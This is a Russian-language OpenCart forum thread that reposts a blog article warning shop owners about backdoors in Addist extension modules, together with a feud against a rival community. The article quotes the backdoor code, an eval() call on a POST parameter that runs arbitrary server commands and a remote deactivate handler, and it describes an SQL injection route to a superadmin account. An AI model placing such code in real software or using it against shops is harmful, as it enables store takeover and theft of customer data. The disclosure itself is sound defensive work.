• Объявления

    • AdministaratorPro

      Перенос Opencart 1.5.x на 2.x (Любые Сборки)   10.06.2016

      И так уважаемые пользователи. Переносим ваш магазин с 1.5.x на 2.x ( любые сборки какие вы пожелаете) .  1) Перенос пользователей 2) Заказов 3) Категорий  4) Товаров  5) SEO 6) Статистику продаж 7) Атрибуты  8) Опции      Во основном всё что нужно для нормальной работы!Остальное по вашему требованию. Стоимость всего 3000 рублей 1 сайт. (возможна скидка).  Для сравнения в среднем берут не менее 70-100$ Срок переноса с 4 часа.  Мы гарантируем стабильную работу движка после переноса, без ошибок! Для заказа напишите мне в ЛС или в Skype: freeopencart.su 1) Dark_Joker 2) Skype: freeopencart.su ОТЗЫВЫ: http://freeopencart.su/topic/1380-отзыв-перенос-opencart-15x-на-2x-акция/
    • AdministaratorPro

      Перенос магазинов с 1.5 и 2.1 на 2.2 и 2.3   13.02.2017

      И так переносим магазины: 1) Opencart 1.5 на 2.x 2) Opencart 2.1.x на 2.2 или 2.3 Что входит в перенос? 1) SEO 2) Заказы 3) Клиенты  4) Категории 5) Товары (опции,атрибуты и т.д) 6) Модули ( только для с 2.1.x на 2.2 и 2.3) 7) Шаблон  ( только для с 2.1.x на 2.2 и 2.3) 8) Настройка магазина Цены: 3000 руб 1) Opencart 1.5 на 2.x   2) Opencart 2.1.x на 2.2 или 2.3   Для заказа Skype: freeopencart.su  или пишите в ЛС http://freeopencart.su/profile/4351-dark_joker/  
    • AdministaratorPro

      Реанимация Интернет-Магазинов + скупка   28.02.2017

      Вам создали или вы сами создали интернет-магазин и он не приносит прибыли? Тогда у нас новый проект для вас. "Реанимация Интернет-Магазинов" И так мы реанимируем ваш интернет магазина . (Цена договорная) Если вы не хотите больше заниматься магазином. Мы предлогаем скупку интернет-магазинов. Мы оцениваем и выкупаем интернет-магазин. Если вы не хотите администрировать магазин или у вас нету времени. Мы готовы предоставить администратора (будет редактировать товары,обновлять информацию и многое другое за небольшую плату.)  1) Оценка вашего магазина (дизайн,ошибки,текста) 2) Оценка рынка товаров 3) Выявления причин плохой работы магазина (техническая часть) 4) Seo аналитика 5) Консультация (бесплатно)    Для заказа: 1) Skype: freeopencart.su 2) Напишите личным сообщением на форуме:  http://freeopencart.su/profile/4351-dark_joker/   (Временно отключена акция)
    • AdministaratorPro

      Перенос с opencart 1.5.x на 3.x и с 2.x на 3.x   12.07.2017

      Уважаемые пользователи вот и вышел долгожданный Opencart 3 https://demo.opencart.com Главная Страница https://demo.opencart.com/admin/ Админка Логин и пароль: demo  И так услуги по переносу с 1.5.x на 3.x Входит в перенос: 1) Клиенты 2) Заказы 3) Пользователи 4) Товары (со всеми опциями и т.д) 5) Категории  6) SEO  7) Страны Короче говоря всё что можно перенести будет перенесено без ошибок и проблем в дальнейшим.  Стоимость переноса 3000 руб. Перенос с 2.x на 3.x  1) Клиенты 2) Заказы 3) Пользователи 4) Товары (со всеми опциями,атрибутами и т.д) 5) Категории  6) SEO  7) Страны,зоны и т.д Стоимость 1800 руб Для заказа пишите мне в ЛС http://freeopencart.su/profile/4351-dark_joker/  или быстрый ответ в Skype: freeopencart.su
restop

Уязвимость опенкарт

4 сообщения в этой теме

Интересно ознакомится.

У Лукоморья дуб зеленый…
Другого названия происходящему, у меня придумать не получилось.

Я вас никогда не просил сделать репосты, и распространить информацию.
Это первый и надеюсь последний раз по такому поводу, но я вас убедительно прошу, мои дорогие читатели, друзья, враги, хейтеры.
Распространите эту статью максимально по своим знакомым у которых есть магазины на Opencart.
Только в моем контакт листе в  скайпе из 200 человек, 10 нашли у себя эту заразу.

Попробую достаточно подробно описать вам всю ситуацию с уязвимостью в дополнениях от Addist и выразить свои догадки, почему так произошло и что делать, чтобы подобная ситуация не повторилась.


Небольшая предыстория. Три дня назад мне в личку прислали файлы модуля от Addist, в которых оказалась целая гора сюрпризов.

1 Самый явный — это:

@eval($this->request->post['command']);[/CODE]


2 Кроме этого:

if (!empty($this->request->get['deactivate']))
{
$this->cache->delete($this->request->get['deactivate']);
$this->config->remove($this->request->get['deactivate']);
}

 

3 И еще

addist_sucks.png

Для тех кто ничего не понимает в программировании, объясню на пальцах:
1. Код позволяет на вашем сервере выполнить любую команду при помощи функции eval(). Грубо говоря, если у вас стоит дополнение Addist, то получить ftp вашего магазина — это 5 секунд времени. Сделал это аддист специально, или случайно — не важно. Факт в том что такие модули обнаружились у почти 1000 владельцев работающих магазинов. Как я предполагал.

2. Во втором примере, господин Мумтоз, как называет себя Аддист, вставил инструмент, который позволяет включать-отключать его модуль также извне удаленной командой на сверер. Но то что при помощи этой конструкции можно заебать владельца магазина до смерти и отключать нон-стоп любые модули, про это аддист или не подумал. Или сделал так специально.

3. Ранее я писал про другие уязвимости в других дополнениях, Аддист болеет и этим — никакого экранирования данных передаваемых в базу, и если соответствующим образом составить данные, при помощи этой дыры можно сделать запрос в базу магазина к примеру добавить пользователя с правами суперадмина, ну а там уже перехватить полный доступ к магазину — тоже не проблема.

——————————————————————————————————————————————

После того, как я получил эту информацию, мы сделали скрипт проверки уязвимости, сделали заплатку для нее ну и я  связался с Диноксом и с 19ым, для того чтобы уведомить всех покупателей и участников комьюнити о наличии данной уязвимости.

C нашего форума и с Liveopencart рассылка пошла сразу же. А вот с Opencartforumом возникла проблема, так как он оказался в стадии переноса, и сделать рассылку не получается до сих пор.  Я все же надеюсь, что в течении следующей недели, они решат эту проблему и у нас получится охватить.

—————————————————————————————————————————————

Как я отношусь к этой ситуации.

Есть несколько аспектов, которые меня немного напрягают.

Как многие знают, все дополнения Addist были по непонятным причинам сняты с продажи на Opencartforum и на Liveopencart.
Но не всех война убила и есть еще опенкарт рашша. Основных персонажей, которые стоят за этим проектом я не знаю. Но и знать не хочу. Лично у меня есть для этого достаточно оснований.

1) Все вонючки с opencartforum, которым по каким то причинам стало там некомфортно, на ресурсах раши, чувствуют себя богами. Не будем тыкать пальцем, все всех знают.

2) Смешно Opencart Russia и в топе Равиль и Мумтоз, осталось позвать Равшан и Джамшут и будет Опенкарт Наша Раша, насяльника.

3) Среди топовых участников этого сообщества, есть несколько людей, устанавливающих клиентам варез, лично ловил за руку.

4) Эти талантливые во всех смыслах персонажи. Не сделали ничего кроме перевода. Все их сообщество держиться сугубо на переводе Opencart на русский язык.
Им некошерно использовать seo_pro для модификации ссылок, они даже не знают что это и зачем. Им некошерно делать уникальные Мета заголовки h1  и title.
Вместо того чтобы перенять опыт и взять лучшее от сообщества OcStore, или у нас. Они пошли своим тупорылым путем.

И вот эта тупорылость, недальновидность, глупость хозеяв сообщества ОпенкартНашаРаша — и это я мягко выражаюь, привела к тому что, в их «типа сборке» отсуствует нормальное seo. Соответственно, вместо того чтобы взять seo-pro от rb2 и любой генератор мета-тегов, они пригрели у себя Аддиста, которого погнали ссаными тряпками отовсюду. И им было хорошо. Модули Addist закрывали проблемы с seo, хозяева Нашей Раши зарабатывали комиссию на продаже дополнений, функционал, которых рядом лежит бесплатно, и по качеству реализации на порядок круче.

После обнаружения уязвимости. Мумтоз начал бегать как ужаленный в жопу. И плакать на всех ресурсах, что его взломали, что он не виновен. Это не его код. И с него требуют 50 000 рублей, за то, чтобы «потихому» замять эту ситуацию. А также он сообщил, что устранил на каком то количестве магазинов свою дыру, через ту же дыру.

Лично я не верю ни одному слову. Так как:

1. Мумтоз не предоставил доказательств фактов взлома.
2. По его словам он закрыл уязвимость первого типа, но я вам привел еще две, и третьего типа проблема осталась, ваши магазины все еще под угрозой.
3. Я провел небольшое личное расследование. Модули с уязвимостью у некоторых моих подопечных были куплены более года назад, для разных версий движка и на разных площадках. Чтобы не быть голословным, помните статью про битву упырей. Она написана 6 мая 2016 года. Олег купил у него модуль, в апреле. Мы подняли архив с этим модулем. Уже тогда в нем есть все вышеописанные дыры. Я не верю, что 7 месяцев, Аддист не мог не замечать, что с его сервера распространяется дырявый код.
4. Будучи не самым плохим программистом, Мумтоз, сознательно использовал небезопасные приемы и реализации, зная, что ставит под удар чужие проекты.

Знаете. Я бы с удовольствием подискутировал и с Мумтозом, и с Джамшутом и с Равшаном. И со всеми всеми, про то какой я плохой. Сколько мне заплатили за эти статьи, чтобы замочить Аддиста и Нашу Рашу, почему я раньше костерил по чем свет Динокса и его форум, а теперь перестал, почему я пиарю Liveopencart, а не пиарю Динокса и еще про массу тайн интриг и расследований. Но я не хочу. Вы там уж сами за моей спиной, думаю справитесь. Все что вам в голову взбредет, говорю сразу — это правда. Так и думайте, так и есть. Йода — средоточие зла, интриган, хам деспот и самодур.

Для всех остальных, если вам интересно мое мнение. Могу сказать просто.
Команда неудачников Нашей Раши, породила такое чудовищное явление как модули Аддиста в свободной продаже. В их оправдания я не верю. Если предположить всё-таки, что наша Маша громко плачет, и на самом деле брешет как сидорова коза, то ответственность за ситуацию абсолютно равнозначная. Как на самом Аддисте, так и на владельцах площадки Опенкарт Наша Раша.

Ну и опять же, если вам интересно мнение, что с этим делать скажу просто. Десятой дорогой обходить эту звероферму. Просто забыть адрес площадки Нашей Раши. А также я всем рекомендую УДАЛИТЬ ВСЕ ВСЕ ВСЕ ФАЙЛЫ МОДУЛЕЙ Addist и попросить у него манибек. Я даже не привожу здесь инструкции для htaccess, которыми мы блокировали всем эту дыру. Просто удаляйте модули без разбирательств. Так как просто беглым просмотром нашлось вместо одной дыры целых три.

И ребят, обычно я всегда каким то образом даю однозначные рекомендации, советы. В данной ситуации все вышенаписанное — это мое личное мнение! Я не настаиваю, чтобы вы к нему прислушивались, я ни в коем случае не призываю вас переходить на мою сторону, становиться моим фанатом, последователем, разделять мои мысли и идеи.
Я просто собрал в кучу ответы на вопросы, которые сыпятся на меня в личке и в комментариях к предыдущей статье.

p.s. Мумтозы, Равили и так далее… Идите лесом. Я изначально хотел дать вам возможность разместить пост в свое оправдание. Но ваше поведение — ниже плинтуса. Поэтому, вам не место у меня в блоге, ищите площадку плакаться за жизнь в другом месте. Здесь ваших комментариев в свое оправдание не будет. Это не Валдайский Дискуссионный клуб!

Изменено пользователем restop

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
В 22.05.2017 в 10:40, Саша Максимів сказал:

Что такое модули аддист?

Рекламный модуль или баннеры...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!


Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.


Войти сейчас

Яндекс.Метрика Рейтинг@Mail.ru